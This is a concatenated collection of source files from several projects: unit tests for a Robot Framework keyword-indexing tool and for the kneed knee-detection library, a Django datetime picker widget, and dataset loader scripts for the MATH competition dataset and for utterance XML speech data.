regex, file_path = get_kw.return_file_and_patter(object_name, kw)
self.assertEqual(regex, '(?im)^resource[_ ]?a[_ ]?keyword[_ ]?1$')
self.assertEqual(file_path, self.resource_a_table_file)
def test_get_regex_resource(self):
kw = 'Common Keyword 2'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
kw = 'RUN'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, '(?im)^run$')
kw = 'Common_Keyword_2'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
kw = 'CommonKeyword2'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
kw = 'commonKeyword2'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
kw = 'COMMON KEYWORD 2'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(regex, self.get_common_keyword_2_regex)
kw = 'Embedding ${arg} To Keyword Name'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(
regex,
'(?im)^embedding[_ ]?\$\{.+\}[_ ]?to[_ ]?keyword[_ ]?name$'
)
kw = 'Embedding ${arg1} And ${arg2} To Keyword Name'
regex = self._get_kw.get_regex_resource(kw)
self.assertEqual(
regex,
(
'(?im)^embedding[_ ]?'
'\$\{.+\}[_ ]?'
'and[_ ]?'
'\$\{.+\}[_ ]?'
'to[_ ]?'
'keyword[_ ]?'
'name$'
)
)
def test_rf_data(self):
self.assertTrue(self._get_kw.rf_data(self.get_common_robot_path))
self.assertFalse(self._get_kw.rf_data(self.get_common_variables_path))
def test_embedding_arg_kw(self):
_get_kw = GetKeyword(
table_dir=self.db_dir,
index_dir=self.index_dir,
open_tab=self.test_b_file,
rf_extension=self.rf_ext
)
regex, file_path = _get_kw.return_file_and_patter(
'', 'Embedding arg To Keyword Name')
self.assertEqual(file_path, self.resource_b_table_file)
self.assertEqual(
regex,
'(?im)^embedding[_ ]?\$\{.+\}[_ ]?to[_ ]?keyword[_ ]?name$'
)
@property
def get_common_robot(self):
return 'common.robot'
@property
def get_common_robot_path(self):
return path.join(self.suite_dir, self.get_common_robot)
@property
def get_common_keyword_2_regex(self):
return '(?im)^common[_ ]?keyword[_ ]?2$'
@property
def get_common_variables_path(self):
return path.join(self.suite_dir, 'common_variables.py')
@property
def test_a_file(self):
return path.normcase(path.join(self.suite_dir, 'test_a.robot'))
@property
def resource_a_table_file(self):
return path.normcase(path.join(self.suite_dir, 'resource_a.robot'))
@property
def test_b_file(self):
return path.normcase(path.join(self.suite_dir, 'test_b.robot'))
@property
def resource_b_table_file(self):
return path.normcase(path.join(self.suite_dir, 'resource_b.robot'))
@property
def test_a_table_name(self):
return rf_table_name(self.test_a_file)
@property
def resource_a_table_name(self):
return rf_table_name(self.resource_a_table_file)
```
#### File: test/unit/test_jump_to_file.py
```python
import os
import shutil
import unittest
from index_runner import index_all
from jump_to_file import JumpToFile
from queue.scanner import Scanner
import env
class TestJumpToFile(unittest.TestCase):
@classmethod
def setUpClass(cls):
db_base = os.path.join(
env.RESULTS_DIR,
'database_jump_to_file')
cls.db_dir = os.path.join(
db_base,
'db_dir'
)
cls.index_dir = os.path.join(
db_base,
'index_dir',
)
cls.suite_dir = os.path.join(
env.TEST_DATA_DIR,
'suite_tree'
)
if os.path.exists(db_base):
shutil.rmtree(db_base)
os.mkdir(db_base)
os.mkdir(cls.db_dir)
os.mkdir(cls.index_dir)
scanner = Scanner()
scanner.scan(
cls.suite_dir,
'robot',
cls.db_dir)
index_all(cls.db_dir, cls.index_dir)
cls.rf_ext = 'robot'
def setUp(self):
self.jump = JumpToFile()
def test_is_resource(self):
line = 'Resource common.robot'
status = self.jump.is_import(line)
self.assertTrue(status)
line = '| Resource | common.robot |'
status = self.jump.is_import(line)
self.assertTrue(status)
line = '| Resource | common.robot |'
status = self.jump.is_import(line)
self.assertTrue(status)
def test_is_library(self):
line = 'Library Selenium2Library'
status = self.jump.is_import(line)
self.assertTrue(status)
line = '| Library | Selenium2Library |'
status = self.jump.is_import(line)
self.assertTrue(status)
line = '| Library | Selenium2Library |'
status = self.jump.is_import(line)
self.assertTrue(status)
def test_get_import_with_resource_space_separator(self):
line = 'Resource ../bar/foo/foonar/common.robot'
imported = self.jump.get_import(line)
self.assertEqual(imported, '../bar/foo/foonar/common.robot')
def test_get_import_with_resource_space_pipe(self):
line = '| Resource | common.robot |'
imported = self.jump.get_import(line)
self.assertEqual(imported, 'common.robot')
line = '| Resource | common.robot |'
imported = self.jump.get_import(line)
self.assertEqual(imported, 'common.robot')
def test_get_import_with_library_space_separator(self):
line = 'Library common.robot'
imported = self.jump.get_import(line)
self.assertEqual(imported, 'common.robot')
def test_get_import_with_library_space_pipe(self):
line = '| Library | common |'
imported = self.jump.get_import(line)
self.assertEqual(imported, 'common')
line = '| Library | foo/bar/common.py |'
imported = self.jump.get_import(line)
self.assertEqual(imported, 'foo/bar/common.py')
def test_get_import_resource_path(self):
if os.sep == '/':
open_tab = '/workspace/resource/file.robot'
else:
open_tab = 'C:\\workspace\\resource\\file.robot'
path = self.jump.get_path_resource_path(
imported_file='Foo/Bar/CommonFile.robot',
open_tab=open_tab
)
if os.sep == '/':
expected = (
'/workspace/resource/'
'Foo/Bar/CommonFile.robot'
)
else:
expected = (
'C:\\workspace\\resource\\'
'Foo\\Bar\\CommonFile.robot'
)
self.assertEqual(path, expected)
def test_get_import_lib_with_path(self):
if os.sep == '/':
open_tab = '/workspace/resource/file.robot'
else:
open_tab = 'C:\\workspace\\resource\\file.robot'
path = self.jump.get_library_path(
imported_lib='Foo/Bar/CommonLib.py',
open_tab=open_tab,
db_dir=self.db_dir
)
if os.sep == '/':
expected = (
'/workspace/resource/'
'Foo/Bar/CommonLib.py'
)
else:
expected = (
'C:\\workspace\\resource\\'
'Foo\\Bar\\CommonLib.py'
)
self.assertEqual(path, expected)
def test_get_import_lib_with_object_name(self):
if os.sep == '/':
open_tab = '/workspace/resource/file.robot'
else:
open_tab = 'C:\\workspace\\resource\\file.robot'
path = self.jump.get_library_path(
imported_lib='BuiltIn',
open_tab=open_tab,
db_dir=self.db_dir
)
self.assertTrue(os.path.isfile(path))
def test_get_path_with_lib(self):
if os.sep == '/':
open_tab = '/workspace/resource/file.robot'
else:
open_tab = 'C:\\workspace\\resource\\file.robot'
path = self.jump.get_import_path(
import_='BuiltIn',
open_tab=open_tab,
db_dir=self.db_dir
)
self.assertTrue(os.path.isfile(path))
def test_get_path_with_resouce(self):
if os.sep == '/':
open_tab = '/workspace/resource/file.robot'
else:
open_tab = 'C:\\workspace\\resource\\file.robot'
path = self.jump.get_import_path(
import_='Foo/Bar/CommonLib.robot',
open_tab=open_tab,
db_dir=self.db_dir
)
self.assertTrue(path)
```
#### File: test/unit/test_runner_for_index.py
```python
import unittest
import env
import os
import shutil
import re
from time import sleep
from queue.scanner import Scanner
from test_runner_for_scanner import run_process
class TestRunner(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.db_dir = os.path.join(
env.RESULTS_DIR,
'db_dir'
)
cls.workspace = os.path.join(env.TEST_DATA_DIR, 'suite_tree')
scanner = Scanner()
scanner.scan(
cls.workspace,
'robot',
cls.db_dir)
def setUp(self):
self.index_path = os.path.join(
env.RESULTS_DIR,
'index_dir'
)
if os.path.exists(self.index_path):
while os.path.exists(self.index_path):
shutil.rmtree(self.index_path)
sleep(0.1)
os.mkdir(self.index_path)
self.runner = os.path.join(env.SRC_DIR, 'run_index.py')
self.index_path = os.path.join(
env.RESULTS_DIR,
'index_dir'
)
def test_index_all_runner(self):
p_args = [
'python',
self.runner,
'all',
'--db_path',
self.db_dir,
'--index_path',
self.index_path
]
log_file = run_process(p_args)
lines = self.clean_info_messages(log_file)
self.assertFalse(lines)
files = os.listdir(self.index_path)
self.assertEqual(len(files), 14)
def test_index_single(self):
db_files = os.listdir(self.db_dir)
p_args = [
'python',
self.runner,
'single',
'--db_path',
self.db_dir,
'--db_table',
db_files[0],
'--index_path',
self.index_path
]
self.assertEqual(len(os.listdir(self.index_path)), 0)
log_file = run_process(p_args)
lines = self.clean_info_messages(log_file)
self.assertFalse(lines)
self.assertEqual(len(os.listdir(self.index_path)), 1)
log_file = run_process(p_args)
lines = self.clean_info_messages(log_file)
self.assertFalse(lines)
self.assertEqual(len(os.listdir(self.index_path)), 1)
p_args = [
'python',
self.runner,
'single',
'--db_path',
self.db_dir,
'--db_table',
db_files[1],
'--index_path',
self.index_path
]
log_file = run_process(p_args)
lines = self.clean_info_messages(log_file)
self.assertFalse(lines)
self.assertEqual(len(os.listdir(self.index_path)), 2)
def clean_info_messages(self, log_file):
f = open(log_file)
# Strip way S2L info messages
pattern = re.compile(
r'(?im)^INFO:'
)
lines = []
for line in f.readlines():
if not pattern.search(line):
lines.append(line)
f.close()
return lines
``` |
{
"source": "JimPrudent/kneed",
"score": 3
} |
#### File: kneed/tests/test_sample.py
```python
import math
import matplotlib.pyplot as plt
import numpy as np
import pytest
from kneed.data_generator import DataGenerator as dg
from kneed.knee_locator import KneeLocator
from kneed.shape_detector import find_shape
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_figure2(interp_method):
"""From the kneedle manuscript"""
x, y = dg.figure2()
kl = KneeLocator(x, y, S=1.0, curve="concave", interp_method=interp_method)
assert math.isclose(kl.knee, 0.22, rel_tol=0.05)
assert math.isclose(kl.elbow, 0.22, rel_tol=0.05)
assert math.isclose(kl.norm_elbow, kl.knee, rel_tol=0.05)
def test_NoisyGaussian():
"""From the Kneedle manuscript"""
x, y = dg.noisy_gaussian(mu=50, sigma=10, N=1000, seed=42)
kl = KneeLocator(
x,
y,
S=1.0,
curve="concave",
interp_method="polynomial",
polynomial_degree=11,
online=True,
)
assert math.isclose(kl.knee, 63.0, rel_tol=1e-02)
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_concave_increasing(interp_method):
"""test a concave increasing function"""
x, y = dg().concave_increasing()
kn = KneeLocator(x, y, curve="concave", interp_method=interp_method)
assert kn.knee == 2
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_concave_decreasing(interp_method):
"""test a concave decreasing function"""
x, y = dg.concave_decreasing()
kn = KneeLocator(
x, y, curve="concave", direction="decreasing", interp_method=interp_method
)
assert kn.knee == 7
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_convex_increasing(interp_method):
"""test a convex increasing function"""
x, y = dg.convex_increasing()
kl = KneeLocator(x, y, curve="convex", interp_method=interp_method)
assert kl.knee == 7
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_convex_decreasing(interp_method):
"""test a convex decreasing function"""
x, y = dg.convex_decreasing()
kl = KneeLocator(
x, y, curve="convex", direction="decreasing", interp_method=interp_method
)
assert kl.knee == 2
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_concave_increasing_truncated(interp_method):
"""test a truncated concave increasing function"""
x, y = dg.concave_increasing()
kl = KneeLocator(
x[:-3] / 10, y[:-3] / 10, curve="concave", interp_method=interp_method
)
assert kl.knee == 0.2
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_concave_decreasing_truncated(interp_method):
"""test a truncated concave decreasing function"""
x, y = dg.concave_decreasing()
kl = KneeLocator(
x[:-3] / 10,
y[:-3] / 10,
curve="concave",
direction="decreasing",
interp_method=interp_method,
)
assert kl.knee == 0.4
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_convex_increasing_truncated(interp_method):
"""test a truncated convex increasing function"""
x, y = dg.convex_increasing()
kl = KneeLocator(
x[:-3] / 10, y[:-3] / 10, curve="convex", interp_method=interp_method
)
assert kl.knee == 0.4
@pytest.mark.parametrize("interp_method", ["interp1d", "polynomial"])
def test_convex_decreasing_truncated(interp_method):
"""test a truncated convex decreasing function"""
x, y = dg.convex_decreasing()
kl = KneeLocator(
x[:-3] / 10,
y[:-3] / 10,
curve="convex",
direction="decreasing",
interp_method=interp_method,
)
assert kl.knee == 0.2
@pytest.mark.parametrize(
"interp_method, expected", [("interp1d", 26), ("polynomial", 28)]
)
def test_convex_decreasing_bumpy(interp_method, expected):
"""test a bumpy convex decreasing function"""
x, y = dg.bumpy()
kl = KneeLocator(
x, y, curve="convex", direction="decreasing", interp_method=interp_method
)
assert kl.knee == expected
@pytest.mark.parametrize("online, expected", [(True, 482), (False, 22)])
def test_gamma_online_offline(online, expected):
"""Tests online and offline knee detection.
Notable that a large number of samples are highly sensitive to S parameter
"""
np.random.seed(23)
n = 1000
x = range(1, n + 1)
y = sorted(np.random.gamma(0.5, 1.0, n), reverse=True)
kl = KneeLocator(x, y, curve="convex", direction="decreasing", online=online)
assert kl.knee == expected
def test_sensitivity():
"""Test the S parameter -- where S is the number of flat points to identify before calling a knee"""
np.random.seed(23)
sensitivity = [1, 3, 5, 10, 100, 200, 400]
detected_knees = []
expected_knees = [43, 137, 178, 258, 305, 482, 482]
n = 1000
x = range(1, n + 1)
y = sorted(np.random.gamma(0.5, 1.0, n), reverse=True)
for s, expected_knee in zip(sensitivity, expected_knees):
kl = KneeLocator(x, y, curve="convex", direction="decreasing", S=s)
detected_knees.append(kl.knee)
assert kl.knee, expected_knee
def test_sine():
x = np.arange(0, 10, 0.1)
y_sin = np.sin(x)
sine_combos = [
("decreasing", "convex"),
("increasing", "convex"),
("increasing", "concave"),
("decreasing", "concave"),
]
expected_knees = [4.5, 4.9, 7.7, 1.8]
detected_knees = []
for direction, curve in sine_combos:
kl_sine = KneeLocator(
x, y_sin, direction=direction, curve=curve, S=1, online=True
)
detected_knees.append(kl_sine.knee)
assert np.isclose(expected_knees, detected_knees).all()
def test_list_input():
"""Indirectly test that flip works on lists as input"""
x, y = dg.figure2()
kl = KneeLocator(
x.tolist(), y.tolist(), S=1.0, curve="concave", interp_method="polynomial"
)
assert math.isclose(kl.knee, 0.22, rel_tol=0.05)
def test_flat_maxima():
"""The global maxima has a sequentially equal value in the difference curve"""
x = [
0,
1.0,
2.0,
3.0,
4.0,
5.0,
6.0,
7.0,
8.0,
9.0,
10.0,
11.0,
12.0,
13.0,
14.0,
15.0,
16.0,
17.0,
]
y = [
1,
0.787701317715959,
0.7437774524158126,
0.6559297218155198,
0.5065885797950219,
0.36749633967789164,
0.2547584187408492,
0.16251830161054173,
0.10395314787701318,
0.06734992679355783,
0.043923865300146414,
0.027818448023426062,
0.01903367496339678,
0.013177159590043924,
0.010248901903367497,
0.007320644216691069,
0.005856515373352855,
0.004392386530014641,
]
# When S=0.0 the first local maximum is found.
kl = KneeLocator(x, y, curve="convex", direction="decreasing", S=0.0)
assert math.isclose(kl.knee, 1.0, rel_tol=0.05)
# When S=1.0 the global maximum is found.
kl = KneeLocator(x, y, curve="convex", direction="decreasing", S=1.0)
assert math.isclose(kl.knee, 8.0, rel_tol=0.05)
def test_all_knees():
x, y = dg.bumpy()
kl = KneeLocator(x, y, curve="convex", direction="decreasing", online=True)
assert np.isclose(sorted(kl.all_elbows), [26, 31, 41, 46, 53]).all()
assert np.isclose(
sorted(kl.all_norm_elbows),
[
0.2921348314606742,
0.348314606741573,
0.4606741573033708,
0.5168539325842696,
0.5955056179775281,
],
).all()
def test_y():
"""Test the y value"""
x, y = dg.figure2()
kl = KneeLocator(x, y, S=1.0, curve="concave", interp_method="interp1d")
assert math.isclose(kl.knee_y, 1.897, rel_tol=0.03)
assert math.isclose(kl.all_knees_y[0], 1.897, rel_tol=0.03)
assert math.isclose(kl.norm_knee_y, 0.758, rel_tol=0.03)
assert math.isclose(kl.all_norm_knees_y[0], 0.758, rel_tol=0.03)
assert math.isclose(kl.elbow_y, 1.897, rel_tol=0.03)
assert math.isclose(kl.all_elbows_y[0], 1.897, rel_tol=0.03)
assert math.isclose(kl.norm_elbow_y, 0.758, rel_tol=0.03)
assert math.isclose(kl.all_norm_elbows_y[0], 0.758, rel_tol=0.03)
def test_y_no_knee():
"""Test the y value, if there is no knee found."""
kl = KneeLocator(
np.array([1, 2, 3]),
np.array([0.90483742, 0.81873075, 0.74081822]),
S=1.0,
curve="convex",
direction="decreasing",
interp_method="interp1d",
online=False,
)
assert kl.knee_y is None
assert kl.norm_knee_y is None
def test_interp_method():
"""Test that the interp_method argument is valid."""
x, y = dg.figure2()
with pytest.raises(ValueError):
kl = KneeLocator(x, y, interp_method="not_a_method")
def test_x_equals_y():
"""Test that a runtime warning is raised when no maxima are found"""
x = range(10)
y = [1] * len(x)
with pytest.warns(RuntimeWarning):
kl = KneeLocator(x, y)
def test_plot_knee_normalized():
"""Test that plotting is functional"""
x, y = dg.figure2()
kl = KneeLocator(x, y, S=1.0, curve="concave", interp_method="interp1d")
num_figures_before = plt.gcf().number
kl.plot_knee_normalized()
num_figures_after = plt.gcf().number
assert num_figures_before < num_figures_after
def test_plot_knee():
"""Test that plotting is functional"""
x, y = dg.figure2()
kl = KneeLocator(x, y, S=1.0, curve="concave", interp_method="interp1d")
num_figures_before = plt.gcf().number
kl.plot_knee()
num_figures_after = plt.gcf().number
assert num_figures_before < num_figures_after
def test_logistic():
y = np.array(
[
2.00855493e-45,
1.10299045e-43,
4.48168384e-42,
1.22376580e-41,
5.10688883e-40,
1.18778110e-38,
5.88777891e-35,
4.25317895e-34,
4.06507035e-33,
6.88084518e-32,
2.99321831e-31,
1.13291723e-30,
1.05244482e-28,
2.67578448e-27,
1.22522190e-26,
2.36517846e-26,
8.30369408e-26,
1.24303033e-25,
2.27726918e-25,
1.06330422e-24,
5.55017673e-24,
1.92068553e-23,
3.31361011e-23,
1.13575247e-22,
1.75386416e-22,
6.52680518e-22,
2.05106011e-21,
6.37285545e-21,
4.16125535e-20,
1.12709507e-19,
5.75853420e-19,
1.73333796e-18,
2.70099890e-18,
7.53254646e-18,
1.38139433e-17,
3.60081965e-17,
8.08419977e-17,
1.86378584e-16,
5.36224556e-16,
8.89404640e-16,
2.34045104e-15,
4.72168880e-15,
6.84378992e-15,
2.26898430e-14,
3.10087652e-14,
2.78081199e-13,
1.06479577e-12,
2.81002203e-12,
4.22067092e-12,
9.27095863e-12,
1.54519738e-11,
4.53347819e-11,
1.35564441e-10,
2.35242087e-10,
4.45253545e-10,
9.78613696e-10,
1.53140922e-09,
2.81648560e-09,
6.70890436e-09,
1.49724785e-08,
5.59553565e-08,
1.39510811e-07,
7.64761811e-07,
1.40723957e-06,
4.97638863e-06,
2.12817943e-05,
3.26471410e-05,
1.02599591e-04,
3.18774179e-04,
5.67297630e-04,
9.22732716e-04,
1.17445643e-03,
3.59279384e-03,
3.61936491e-02,
6.39493416e-02,
1.29304829e-01,
1.72272215e-01,
3.46945901e-01,
5.02826602e-01,
6.24800042e-01,
7.38412957e-01,
7.59931663e-01,
7.73374421e-01,
7.91421897e-01,
8.29325597e-01,
8.57718637e-01,
8.73286061e-01,
8.77056835e-01,
8.93173768e-01,
9.05435646e-01,
9.17217910e-01,
9.19119179e-01,
9.24810910e-01,
9.26306908e-01,
9.28621233e-01,
9.33855835e-01,
9.37263027e-01,
9.41651642e-01,
]
)
x = np.array(
[
1.0,
2.0,
3.0,
4.0,
5.0,
6.0,
7.0,
8.0,
9.0,
10.0,
11.0,
12.0,
13.0,
14.0,
15.0,
16.0,
17.0,
18.0,
19.0,
20.0,
21.0,
22.0,
23.0,
24.0,
25.0,
26.0,
27.0,
28.0,
29.0,
30.0,
31.0,
32.0,
33.0,
34.0,
35.0,
36.0,
37.0,
38.0,
39.0,
40.0,
41.0,
42.0,
43.0,
44.0,
45.0,
46.0,
47.0,
48.0,
49.0,
50.0,
51.0,
52.0,
53.0,
54.0,
55.0,
56.0,
57.0,
58.0,
59.0,
60.0,
61.0,
62.0,
63.0,
64.0,
65.0,
66.0,
67.0,
68.0,
69.0,
70.0,
71.0,
72.0,
73.0,
74.0,
75.0,
76.0,
77.0,
78.0,
79.0,
80.0,
81.0,
82.0,
83.0,
84.0,
85.0,
86.0,
87.0,
88.0,
89.0,
90.0,
91.0,
92.0,
93.0,
94.0,
95.0,
96.0,
97.0,
98.0,
]
)
kl = KneeLocator(x, y, curve="convex", direction="increasing", online=True,)
assert kl.knee == 73
def test_valid_curve_direction():
"""Test that arguments to curve and direction are valid"""
with pytest.raises(ValueError):
kl = KneeLocator(range(3), [1, 3, 5], curve="bad curve")
with pytest.raises(ValueError):
kl = KneeLocator(range(3), [1, 3, 5], direction="bad direction")
def test_find_shape():
"""Test that find_shape can detect the right shape of curve line"""
x, y = dg.concave_increasing()
direction, curve = find_shape(x, y)
assert direction == 'increasing'
assert curve == 'concave'
x, y = dg.concave_decreasing()
direction, curve = find_shape(x, y)
assert direction == 'decreasing'
assert curve == 'concave'
x, y = dg.convex_decreasing()
direction, curve = find_shape(x, y)
assert direction == 'decreasing'
assert curve == 'convex'
x, y = dg.convex_increasing()
direction, curve = find_shape(x, y)
assert direction == 'increasing'
assert curve == 'convex'
``` |
{
"source": "jimr/django-datetime-widget",
"score": 2
} |
#### File: django-datetime-widget/datetimewidget/widgets.py
```python
__author__ = '<NAME>'
import re
import uuid
from django.forms.widgets import MultiWidget , to_current_timezone, DateTimeInput
from django.utils.translation import ugettext as _
from datetime import datetime
from django.utils import translation
I18N = """
$.fn.datetimepicker.dates['en'] = {
days: %s,
daysShort: %s,
daysMin: %s,
months: %s,
monthsShort: %s,
meridiem: %s,
suffix: %s,
today: %s
};
"""
datetimepicker_options = """
format : '%s',
startDate : '%s',
endDate : '%s',
weekStart : %s,
daysOfWeekDisabled : %s,
autoclose : %s,
startView : %s,
minView : %s,
maxView : %s,
todayBtn : %s,
todayHighlight : %s,
minuteStep : %s,
pickerPosition : '%s',
showMeridian : %s,
language : '%s',
"""
dateConversion = {
'P' : '%p',
'ss' : '%S',
'ii' : '%M',
'hh' : '%H',
'HH' : '%I',
'dd' : '%d',
'mm' : '%m',
#'M' : '%b',
#'MM' : '%B',
'yy' : '%y',
'yyyy' : '%Y',
}
class DateTimeWidget(MultiWidget):
def __init__(self, attrs=None, options = {}):
if attrs is None:
attrs = {'readonly':''}
self.option = ()
self.option += (options.get('format','dd/mm/yyyy hh:ii'),)
self.option += (options.get('startDate',''),)
self.option += (options.get('endDate',''),)
self.option += (options.get('weekStart','0'),)
self.option += (options.get('daysOfWeekDisabled','[]'),)
self.option += (options.get('autoclose','false'),)
self.option += (options.get('startView','2'),)
self.option += (options.get('minView','0'),)
self.option += (options.get('maxView','4'),)
self.option += (options.get('todayBtn','false'),)
self.option += (options.get('todayHighlight','false'),)
self.option += (options.get('minuteStep','5'),)
self.option += (options.get('pickerPosition','bottom-right'),)
self.option += (options.get('showMeridian','false'),)
pattern = re.compile(r'\b(' + '|'.join(dateConversion.keys()) + r')\b')
self.dataTimeFormat = self.option[0]
self.format = pattern.sub(lambda x: dateConversion[x.group()], self.option[0])
widgets = (DateTimeInput(attrs=attrs,format=self.format),)
super(DateTimeWidget, self).__init__(widgets, attrs)
def value_from_datadict(self, data, files, name):
date_time = [
widget.value_from_datadict(data, files, name + '_%s' % i)
for i, widget in enumerate(self.widgets)]
try:
D = to_current_timezone(datetime.strptime(date_time[0], self.format))
except ValueError:
return ''
else:
return str(D)
def decompress(self, value):
if value:
value = to_current_timezone(value)
return (value,)
return (None,)
def format_output(self, rendered_widgets):
"""
Given a list of rendered widgets (as strings), it inserts an HTML
linebreak between them.
Returns a Unicode string representing the HTML for the whole lot.
"""
WEEKDAYS = [ _("Sunday"), _("Monday"), _("Tuesday"), _("Wednesday"), _("Thursday"), _("Friday"), _("Saturday"), _("Sunday")]
WEEKDAYS_ABBR = [_("Sun"), _("Mon"), _("Tue"), _("Wed"), _("Thu"), _("Fri"), _("Sat"), _("Sun")]
WEEKDAYS_MIN = [_("Su"), _("Mo"), _("Tu"), _("We"), _("Th"), _("Fr"), _("Sa"), _("Su")]
MONTHS = [_("January"), _("February"), _("March"), _("April"), _("May"), _("June"), _("July"), _("August"), _("September"), _("October"), _("November"), _("December")]
MONTHS_ABBR = [_("Jan"), _("Feb"), _("Mar"), _("Apr"), _("May"), _("Jun"), _("Jul"), _("Aug"), _("Sep"), _("Oct"), _("Nov"), _("Dec")]
MERDIEM = [_("am"), _("pm")]
SUFFIX = [_("st"), _("nd"), _("rd"), _("th")]
TODAY = "'%s'"%_("Today")
js_i18n = I18N % (WEEKDAYS,WEEKDAYS_ABBR, WEEKDAYS_MIN, MONTHS, MONTHS_ABBR, MERDIEM, SUFFIX, TODAY)
options = self.option+(translation.get_language(),)
js_options = datetimepicker_options % options
id = uuid.uuid4().hex
return '<div id="%s" class="input-append date form_datetime">'\
'%s'\
'<span class="add-on"><i class="icon-th"></i></span>'\
'</div>'\
'<script type="text/javascript">'\
'%s$("#%s").datetimepicker({%s});'\
'</script> ' % ( id, rendered_widgets[0], js_i18n.replace(', u\'',', \'').replace('[u', '['), id , js_options)
class Media:
css = {
'all' : ('css/datetimepicker.css',)
}
js = (
"js/bootstrap-datetimepicker.js",
)
``` |
{
"source": "jimregan/datasets",
"score": 3
} |
#### File: datasets/competition_math/competition_math.py
```python
import glob
import json
import os
import datasets
_CITATION = """\
@article{hendrycksmath2021,
title={Measuring Mathematical Problem Solving With the MATH Dataset},
author={<NAME>
and <NAME>
and <NAME>
and <NAME>
and <NAME>
and <NAME>
and <NAME>
and <NAME>},
journal={arXiv preprint arXiv:2103.03874},
year={2021}
}
"""
_DESCRIPTION = """\
The Mathematics Aptitude Test of Heuristics (MATH) dataset consists of problems
from mathematics competitions, including the AMC 10, AMC 12, AIME, and more.
Each problem in MATH has a full step-by-step solution, which can be used to teach
models to generate answer derivations and explanations.
"""
_HOMEPAGE = "https://github.com/hendrycks/math"
_LICENSE = "https://github.com/hendrycks/math/blob/main/LICENSE"
_URL = "https://people.eecs.berkeley.edu/~hendrycks/MATH.tar"
class CompetitionMathDataset(datasets.GeneratorBasedBuilder):
"""Mathematics Aptitude Test of Heuristics (MATH) dataset."""
VERSION = datasets.Version("1.0.0")
def _info(self):
features = datasets.Features(
{
"problem": datasets.Value("string"),
"level": datasets.Value("string"),
"type": datasets.Value("string"),
"solution": datasets.Value("string"),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
download_dir = dl_manager.download_and_extract(_URL)
math_dir = os.path.join(download_dir, "MATH")
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={"math_dir": math_dir, "split": "train"},
),
datasets.SplitGenerator(
name=datasets.Split.TEST,
gen_kwargs={"math_dir": math_dir, "split": "test"},
),
]
def _generate_examples(self, math_dir, split):
"""Yields examples as (key, example) tuples."""
filepaths = glob.glob(os.path.join(math_dir, split, "*/*"))
for id_, filepath in enumerate(filepaths):
with open(filepath, "rb") as fin:
example = json.load(fin)
yield id_, example
``` |
{
"source": "jimregan/notes",
"score": 2
} |
#### File: notes/_drafts/abairxml.py
```python
import os
from pathlib import Path
import re
import io
import datasets
import xml.etree.ElementTree as ET
import xml.sax.saxutils as saxutils
_DESCRIPTION = """\
Builds a dataset from a directory containing utterance XML files.
If you're not in the TCD phonetics lab, this is of no use to you.
"""
logger = datasets.utils.logging.get_logger(__name__)
class UtteranceXMLDataset(datasets.GeneratorBasedBuilder):
"""Speech dataset from data annotated with utternance XML."""
VERSION = datasets.Version("1.1.0")
BUILDER_CONFIGS = [
datasets.BuilderConfig(name="utterance", version=VERSION),
]
def _info(self):
features = datasets.Features(
{
"file_id": datasets.Value("string"),
"words": datasets.Value("string"),
"phonemes": datasets.Sequence(datasets.Value("string")),
"audio": datasets.Value("string"),
"dialect": datasets.Value("string"),
"language": datasets.Value("string"),
"speaker_id": datasets.Value("string"),
"audio_set": datasets.Value("string")
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
manual_dir = os.path.abspath(os.path.expanduser(dl_manager.manual_dir))
if not os.path.exists(manual_dir):
raise FileNotFoundError(
"{} does not exist. Make sure you insert a manual dir via `datasets.load_dataset('phonlab-tcd/utterance-xml', data_dir=...)` with the path to the corpus directory".format(
manual_dir
)
)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"data_dir": manual_dir,
"split": "train",
},
),
]
def _generate_examples(
self, data_dir, split
):
""" Yields examples as (key, example) tuples. """
matcher = re.match(".*/([a-z]{3})_ga_(ul|mu|co)[_/](.*)/?$", data_dir)
matcher2 = re.match(".*/ga_(UL|MU|CP)/([a-z]{3})/([^/]*)/?$", data_dir)
matcher_en = re.match(".*/([a-z]{3})_en_ie", data_dir)
if matcher:
speaker_id = matcher.group(1)
language = "ga"
dialect = matcher.group(2)
audio_set = matcher.group(3)
elif matcher2:
speaker_id = matcher2.group(2)
language = "ga"
dialect = matcher2.group(1).lower()
audio_set = matcher2.group(3)
elif matcher_en:
language = "en"
dialect = "ie"
speaker_id = matcher_en.group(1)
audio_set = f"{speaker_id}_en_ie"
elif "mul_ga_msf" in data_dir:
language = "ga"
dialect = "mu"
speaker_id = "mul"
audio_set = "msf"
else:
raise Exception(f"{data_dir} {type(data_dir)} doesn't look like a valid path")
dd_path = Path(data_dir)
xml_path = dd_path / "xml"
if not xml_path.is_dir():
xml_path = dd_path / "xmlproc"
_AUDIO = ["wav", "wav16", "wav44", "wav_trimmed", "wav16_trimmed", "wav44_trimmed", "ogg"]
_id = 1
for xmlfile in xml_path.glob("*.xml"):
utt = from_xml(xmlfile)
words = utt_to_words(utt)
phonemes = utt_to_phonemes(utt)
assert len(words) == len(phonemes)
